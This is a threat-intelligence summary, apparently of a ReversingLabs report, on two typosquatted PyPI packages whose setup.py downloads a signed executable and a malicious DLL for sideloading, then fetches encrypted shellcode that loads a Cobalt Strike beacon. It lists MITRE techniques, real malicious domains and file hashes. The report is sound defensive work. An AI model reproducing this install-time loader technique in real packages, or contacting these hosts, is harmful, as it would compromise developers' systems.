Keypoints
- Two PyPI packages (NP6HelperHttptest, NP6HelperHttper) used typosquatting to masquerade as legitimate helper libraries and contained malicious setup.py scripts.
- The setup.py files download ComServer.exe (signed legitimate executable) and a malicious dgdeskband64.dll, then launch ComServer.exe to trigger DLL sideloading.
- The malicious dgdeskband64.dll implements a Dllinstall export that registers an exception handler, forces a division-by-zero to trigger it, and then downloads a payload (an.gif) from us.archive-ubuntu.top.
- The downloaded an.gif is actually XOR-encrypted x86_64 shellcode which is decrypted in memory, revealing a PE consistent with a Cobalt Strike beacon that is executed via a NotifyIpInterfaceChange callback.
- Retro-hunting found related samples using windowsaccessbridge-64.dll and a zip from hxxps://cdn.0c.sk/1101012.zip, linking the PyPI activity to a wider campaign with reused signing artifacts.
MITRE Techniques
- [T1574.002] DLL Side-Loading – Malicious DLL is loaded by a legitimate signed executable to execute attacker code (‘…executes the signed file ComServer.exe in a new process.’ )
- [T1105] Ingress Tool Transfer – Installer downloads external binaries (ComServer.exe and dgdeskband64.dll) as part of the attack chain (‘…setup.py Python script downloads the ComServer.exe and dgdeskband64.dll…’)
- [T1195] Supply Chain Compromise – Typosquatting and malicious packages in PyPI used to introduce malware into developer environments (‘…employ typosquatting, using names that are nearly identical to one of the legitimate NP6 packages.’)
- [T1059] Command and Scripting Interpreter – Malicious behavior executed via the Python setup/install process (setup.py) to perform network fetches and execution (‘…contains a setup.py script, which extends setuptools commands with custom code designed to download two files…’)
- [T1055] Process Injection / In-memory Execution – Shellcode is streamed into memory and execution is redirected via an API callback to run the payload without writing a normal executable (‘…the shellcode is streamed to memory and the execution is then redirected to it through a callback registered for the NotifyIpInterfaceChange function.’)
Indicators of Compromise
- [PyPI package names and hashes] Malicious packages and versions observed – NP6HelperHttptest (SHA1: 1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4), NP6HelperHttper (SHA1: a65bce340366f724d444978dcdcd877fa2cacb1c), and additional NP6HelperHttptest hashes.
- [Domains/URLs] Hosting and C2 infrastructure – fus.rngupdatem.buzz (malicious DLL host), us.archive-ubuntu.top (hosting shellcode payload), and hxxps://cdn.0c.sk/1101012.zip (zip archive used by related sample).
- [File names and hashes] Malicious binaries and payloads – dgdeskband.dll (PE/dll SHA1: 1f9fcf86a56394a7267d85ba76c1256d12e3e76b), windowsaccessbridge-64.dll (PE/dll SHA1: 84c75536b279a85a5320f058514b884a016bc8c8), an.gif (shellcode SHA1: 2dc80f45540d0a3ea33830848fcf529f98ea2f5e).
Rewritten technical summary:
Malicious PyPI packages included a crafted setup.py that downloads two files at install time: a legitimately signed executable (ComServer.exe) and a malicious DLL (dgdeskband64.dll). The installer launches ComServer.exe, which is designed to load a library named dgdeskband64.dll; the attacker-supplied DLL contains a single Dllinstall export that replaces the expected library and provides the malicious execution path.
Inside Dllinstall the malware registers an exception handler, deliberately triggers an exception via a divide-by-zero loop to transfer execution to a malicious routine, and then performs an HTTP GET to retrieve an.gif from us.archive-ubuntu.top. The retrieved file is actually XOR-encrypted x86_64 shellcode; the DLL decrypts the shellcode in-memory and streams it into execution, transferring control via a callback registered on NotifyIpInterfaceChange to run the payload without dropping a conventional executable.
Retro-hunting revealed additional samples using the same delivery pattern (different signed EXE + malicious DLL pairing, e.g., windowsaccessbridge-64.dll) and shared infrastructure (hxxps://cdn.0c.sk/1101012.zip). The decrypted in-memory payload shows artifacts consistent with a Cobalt Strike beacon, tying the PyPI packages to a broader supply-chain campaign that reuses domains, zip archives, and signing artifacts.
Read more: https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls